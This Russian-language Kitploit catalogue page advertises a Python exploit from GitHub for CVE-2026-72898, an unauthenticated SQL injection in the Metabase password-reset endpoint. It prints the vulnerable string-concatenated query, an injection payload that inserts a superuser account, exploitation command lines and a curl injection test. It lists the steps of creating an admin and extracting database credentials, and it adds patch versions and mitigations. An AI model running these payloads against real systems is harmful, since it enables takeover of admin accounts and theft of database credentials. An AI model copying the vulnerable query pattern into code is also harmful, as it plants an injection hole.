Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-72898 — Python-эксплойт для CVE-2026-72898 — неаутентифицированной SQL-инъекции в эндпоинте сброса пароля Metabase, позволяющей создавать учётные записи администратора и извлекать учётные данные базы данных. | Kitploit
Инструменты/GitHubGitHub/34zy/cve-2026-72898
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияВеб-безопасностьТестирование на ПроникновениеRed TeamingБезопасность Баз Данных
GitHub34zy/cve-2026-72898

CVE-2026-72898

Python-эксплойт для CVE-2026-72898 — неаутентифицированной SQL-инъекции в эндпоинте сброса пароля Metabase, позволяющей создавать учётные записи администратора и извлекать учётные данные базы данных.

6 ч 14 мин назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Metabase SQL Injection RCE

CVSS 10.0 CRITICAL EXPLOITED NO AUTH

Демонстрация эксплуатации

Неаутентифицированная SQL-инъекция в эндпоинте Metabase /api/session/reset_password. Позволяет создавать учётные записи администратора и извлекать учётные данные базы данных.

Затронуто: v58.0 - v63.3 | Исправлено: v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+


Быстрый старт

root@kitploit:~
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check

Уязвимость

Конкатенация строк в SQL-запросе:

root@kitploit:~
# Уязвимый код
query = f"SELECT * FROM core_user WHERE email='{email}'"

Полезная нагрузка атаки:

root@kitploit:~
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --

Использование

Только проверка (без модификации):

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 --check

Полная эксплуатация:

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!

Ручное тестирование:

root@kitploit:~
# Проверка эндпоинта
curl http://localhost:5000/api/health

# Тест SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
  -H "Content-Type: application/json" \
  -d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'

Что делает

  1. Обнаруживает экземпляр Metabase (boolean-based SQLi)
  2. Создаёт пользователя-администратора через SQL-инъекцию
  3. Аутентифицируется под новым администратором
  4. Извлекает учётные данные подключённой базы данных
  5. Подтверждает полную компрометацию системы

Воздействие

  • Неаутентифицированный доступ администратора
  • Извлечение учётных данных базы данных
  • Компрометация подключённой базы данных
  • Полный контроль над приложением

Меры защиты

СЕЙЧАС:

  • Обновитесь до исправленной версии
  • Заблокируйте /api/session/reset_password через WAF
  • Проверьте учётные записи администраторов на несанкционированные добавления
  • Смените все учётные данные баз данных

ПОЗЖЕ:

  • Используйте параметризованные запросы
  • Добавьте валидацию входных данных
  • Внедрите аутентификацию на всех чувствительных эндпоинтах
  • Включите логирование SQL-запросов

Ссылки

  • GitHub Advisory
  • NVD CVE Entry

Только для авторизованного использования. Несанкционированный доступ незаконен.

Скачать инструмент